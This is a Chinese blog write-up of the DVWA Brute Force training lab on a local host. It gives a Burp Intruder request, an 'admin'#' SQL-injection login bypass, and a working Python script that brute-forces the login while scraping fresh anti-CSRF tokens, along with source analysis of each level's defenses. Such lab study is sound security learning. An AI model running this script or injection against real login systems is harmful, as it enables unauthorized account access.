DVWA学习之Brute Force

BurpSuite-Intruder笔记

Burp intruder是一个强大的工具,用于自动对Web应用程序自定义的攻击。它可以用来自动执行所有类型的任务您的测试过程中可能出现的

模块说明

  • Target 用于配置目标服务器进行攻击的详细信息
  • Positions 设置Payloads的插入点以及攻击类型(攻击模式)
  • Payloads 设置payload,配置字典
  • Opetions 此选项卡包含了request headers,request engine,attack results ,grep match,grep_extrack,grep payloads和redirections。你可以发动攻击之前,在主要Intruder的UI上编辑这些选项,大部分设置也可以在攻击时对已在运行的窗口进行修改

Burpsuite模块—-Intruder模块详解

Brute Force过关

Low

常规爆破

  • 使用attack type为sniper
  • payload positions
GET /vulnerabilities/brute/?username=admin&password=§s§&Login=Login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://127.0.0.1/vulnerabilities/brute/?username=admin&password=password&Login=Login
Connection: close
Cookie: PHPSESSID=jabf5chqkj7mlcv86sf7l6r131; security=low
Upgrade-Insecure-Requests: 1
  • 爆破结果

length排序,发现密码为password
DVWA学习之Brute Force_第1张图片

源码分析

' . mysql_error() . '
' ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); // Login successful echo "

Welcome to the password protected area {$user}

"; echo ""; } else { // Login failed echo "

Username and/or password incorrect.
"; } mysql_close(); } ?>
  • if( isset( $_GET[ 'Login' ] ) )可以看到,服务器只是验证了参数Login是否被设置(isset函数在php中用来检测变量是否设置,该函数返回的是布尔类型的值,即true/false),没有任何的防爆破机制;
  • $pass = md5( $pass );可知程序对输入的密码做了md5转换,因此不能注入攻击。但是由$user = $_GET[ 'username' ];和查询语句$query = "SELECT * FROM users WHERE user = '$user' AND password = '$pass';";可知,用户输入Username:处存在SQL注入。
  • 用户名输入admin'#得到:

DVWA学习之Brute Force_第2张图片

Medium

常规爆破

可爆破出密码,速度很慢

源码分析

' . mysql_error() . '
' ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); // Login successful echo "

Welcome to the password protected area {$user}

"; echo ""; } else { // Login failed sleep( 2 ); echo "

Username and/or password incorrect.
"; } mysql_close(); } ?>
  • sleep( 2 ); 使得爆破;速度很慢,但仍然没有防爆破机制;
  • 对比low的源码在用户输入处加入mysql_real_escape_string函数做处理,该函数会对字符串中的特殊符号(x00,n,r,,’,”,x1a)进行转义,基本上能够抵御sql注入攻击(MySQL5.5.37以下版本如果设置编码为GBK,能够构造编码绕过mysql_real_escape_string 对单引号的转义)PHP字符编码绕过漏洞总结

high

常规爆破

失败

源码分析


' . mysql_error() . '
' ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); // Login successful echo "

Welcome to the password protected area {$user}

"; echo ""; } else { // Login failed sleep( rand( 0, 3 ) ); echo "

Username and/or password incorrect.
"; } mysql_close(); } // Generate Anti-CSRF token generateSessionToken(); ?>
  • checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );加入了Anti-CSRFtoken,使得burp suite爆破失效;

正常登录分析:

  • 观察登录提交的URL

http://127.0.0.1/vulnerabilities/brute/?username=admin&password=password&Login=Login&user_token=5b8ebd4aed00f92040bf08462ebb774d
发现较之前多提交了一个参数user_token,寻找user_token出处;

  • 查看http://127.0.0.1/vulnerabilities/brute/源代码用户登录处:

Vulnerability: Brute Force

Login

Username:

Password:


Welcome to the password protected area admin

发现user_token的值;

  • 推测登录流程:

先从提交表单处获取user_token的值,在提交表单时加入user_token参数,服务器端验证user_token的值后再验证登录是否成功。

正确爆破姿势

使用Python脚本爆破(BeautifulSoup + urllib.request)

  • 源码使用if( isset( $_GET[ 'Login' ] ) )判断,未对登录失败次数做限制,因此仍然可以爆破密码;
  • 使用BeautifulSoup库从每次请求的页面中抓取user_token的值,带入下一次get请求的user_token中。
from bs4 import BeautifulSoup
import urllib.request
import urllib.error

header = {
    "Host": "127.0.0.1",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Referer": "http://127.0.0.1/vulnerabilities/brute/",
    "Connection": "close",
    "Cookie": "PHPSESSID=jabf5chqkj7mlcv86sf7l6r131; security=high"
}
url = "http://127.0.0.1/vulnerabilities/brute/"

def get_user_token(url, header):
    try:
        req = urllib.request.Request(url, headers=header)
        res = urllib.request.urlopen(req)
    except urllib.error.URLError as e:
        if hasattr(e, "code"):
            print(e.code)
        if hasattr(e, "reason"):
            print(e.reason)
    except Exception as e:
        print(e)
    else:
        soup = BeautifulSoup(res.read(), "html.parser")
        user_token = soup.select('input[type="hidden"]')
        return user_token[0].get('value')

def brute_req(next_url):
    # next_url = 'http://127.0.0.1/vulnerabilities/brute/?username=admin&password={}&Login=Login&user_token={}'.format(password, user_token)
    try:
        req = urllib.request.Request(next_url, headers=header)
        res = urllib.request.urlopen(req)
    except urllib.error.URLError as e:
        if hasattr(e, "code"):
            print(e.code)
        if hasattr(e, "reason"):
            print(e.reason)
    except Exception as e:
        print(e)
    else:
        print(str(res.code) + " ", end='')
        print(len(res.read()))

if __name__ == '__main__':
    with open('password.txt', 'r') as fd:
        password_list = fd.read().split('\n')
    user_token = get_user_token(url, header)
    for password in password_list:
        next_url = 'http://127.0.0.1/vulnerabilities/brute/?username=admin&password={}&Login=Login&user_token={}'.format(
            password, user_token)
        print(password + ":", end="")
        brute_req(next_url=next_url)
        user_token = get_user_token(next_url, header)

运行结果片段:

roots:200 5031
test:200 5031
test1:200 5031
test123:200 5031
test2:200 5031
password:200 5085
aaaAAA111:200 5031
888888:200 5031
88888888:200 5031
000000:200 5031
00000000:200 5031
111111:200 5031
11111111:200 5031
aaaaaa:200 5031
aaaaaaaa:200 5031
135246:200 5031
135246789:200 5031
123456:200 5031
654321:200 5031
12345:200 5031
54321:200 5031
123456789:200 5031
1234567890:200 5031
123qwe:200 5031

发现password密码的返回长度与其他不同,获得密码,爆破成功。

Impossible

源码分析

 prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // Check to see if the user has been locked out.
    if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo "

This account has been locked due to too many incorrect logins.
"; // Calculate when the user would be allowed to login again $last_login = $row[ 'last_login' ]; $last_login = strtotime( $last_login ); $timeout = strtotime( "{$last_login} +{$lockout_time} minutes" ); $timenow = strtotime( "now" ); // Check to see if enough time has passed, if it hasn't locked the account if( $timenow > $timeout ) $account_locked = true; } // Check the database (if username matches the password) $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR); $data->bindParam( ':password', $pass, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch(); // If its a valid login... if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) { // Get users details $avatar = $row[ 'avatar' ]; $failed_login = $row[ 'failed_login' ]; $last_login = $row[ 'last_login' ]; // Login successful echo "

Welcome to the password protected area {$user}

"; echo ""; // Had the account been locked out since last login? if( $failed_login >= $total_failed_login ) { echo "

Warning: Someone might of been brute forcing your account.

"; echo "

Number of login attempts: {$failed_login}.
Last login attempt was at: ${last_login}.

"; } // Reset bad login count $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); } else { // Login failed sleep( rand( 2, 4 ) ); // Give the user some feedback echo "

Username and/or password incorrect.

Alternative, the account has been locked because of too many failed logins.
If this is the case, please try again in {$lockout_time} minutes.
"; // Update bad login count $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); } // Set the last login time $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); } // Generate Anti-CSRF token generateSessionToken(); ?>
  • checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );加入了Anti-CSRFtoken;
  • 对登录失败次数做限制,防止爆破;
  • 用了更为安全的PDO(PHP Data Object)机制防御sql注入

你可能感兴趣的:(安全测试,python)